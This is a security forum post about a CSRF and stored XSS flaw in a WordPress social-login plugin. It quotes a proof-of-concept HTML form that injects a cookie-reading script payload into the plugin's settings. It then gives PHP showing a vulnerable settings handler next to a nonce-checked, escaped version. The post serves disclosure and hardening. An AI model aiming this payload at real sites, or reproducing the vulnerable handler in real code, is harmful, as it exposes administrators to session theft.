CSRF/Cross-Site Scripting (XSS) Vulnerability in WordPress Social Login

Posted in QUE.com Forums – Cyber Security

    Support @QUE.COM (post #27361)

    I removed the WordPress Social Login plugin from our website due to a vulnerability.

    Proof of Concept
    The following proof of concept will cause an alert box with any available cookies to be shown when visiting the plugin’s admin page, /wp-admin/admin.php?page=mo_openid_settings.

    Make sure to replace “[path to WordPress]” with the location of WordPress.

    <form action="http://[path to WordPress]/wp-admin/admin.php?page=mo_openid_settings" method="POST">
    <input type="hidden" name="option" value="mo_openid_enable_apps" />
    <input type="hidden" name="mo_openid_login_widget_customize_text" value='"><script>alert(document.cookie);</script>' />
    <input type="submit" value="Submit" />
    </form>

    Read this article. https://www.pluginvulnerabilities.com/2019/04/01/csrf-cross-site-scripting-xss-vulnerability-in-social-login-social-sharing-by-miniorange-wordpress-social-login-facebook-google-twitter/

    You can still log in to our website using your existing account; retrieve a new password and it will be sent to your email address on file.

    Be safe in the wild wild Internet.
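The two defects the proof of concept relies on are a settings POST that is accepted without a nonce check and a saved value that is echoed back into an attribute unescaped. The following is an added example, not the plugin's own code, showing that pattern beside a hardened WordPress settings handler; the function names, the nonce action string and the capability are assumptions.

```php
<?php
// Added example (not the plugin's code). Function names, the nonce action
// and the capability are assumptions; the option names match the PoC above.

// Vulnerable pattern: trusts any POST and echoes the stored value raw.
function que_example_vulnerable_settings_page() {
    if ( isset( $_POST['option'] ) && $_POST['option'] === 'mo_openid_enable_apps' ) {
        // No nonce check: a form submitted from another site is accepted
        // with the logged-in administrator's cookies (CSRF).
        update_option( 'mo_openid_login_widget_customize_text',
            $_POST['mo_openid_login_widget_customize_text'] );
    }
    $text = get_option( 'mo_openid_login_widget_customize_text', '' );
    // Unescaped output: a value beginning with "> closes the attribute
    // and the rest is rendered as markup (stored XSS).
    echo '<input type="text" name="mo_openid_login_widget_customize_text" value="' . $text . '">';
}

// Hardened pattern: capability check, nonce check, sanitised storage, escaped output.
function que_example_hardened_settings_page() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    if ( isset( $_POST['option'] ) && $_POST['option'] === 'mo_openid_enable_apps' ) {
        // Dies with HTTP 403 unless the request carries a valid nonce for this action,
        // so a cross-site form cannot change the setting.
        check_admin_referer( 'que_example_save_settings' );
        update_option( 'mo_openid_login_widget_customize_text',
            sanitize_text_field( wp_unslash( $_POST['mo_openid_login_widget_customize_text'] ?? '' ) ) );
    }
    $text = get_option( 'mo_openid_login_widget_customize_text', '' );
    echo '<form method="post">';
    wp_nonce_field( 'que_example_save_settings' ); // emits the _wpnonce and referer fields
    echo '<input type="hidden" name="option" value="mo_openid_enable_apps">';
    // esc_attr() encodes ", ', <, > and &, so the value cannot break out of the attribute.
    echo '<input type="text" name="mo_openid_login_widget_customize_text" value="'
        . esc_attr( $text ) . '">';
    echo '<input type="submit" value="Save">';
    echo '</form>';
}
```

Both checks are needed: the nonce stops the cross-site write, and the output escaping stops a value that reaches the database by any other route from executing in the admin's browser.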
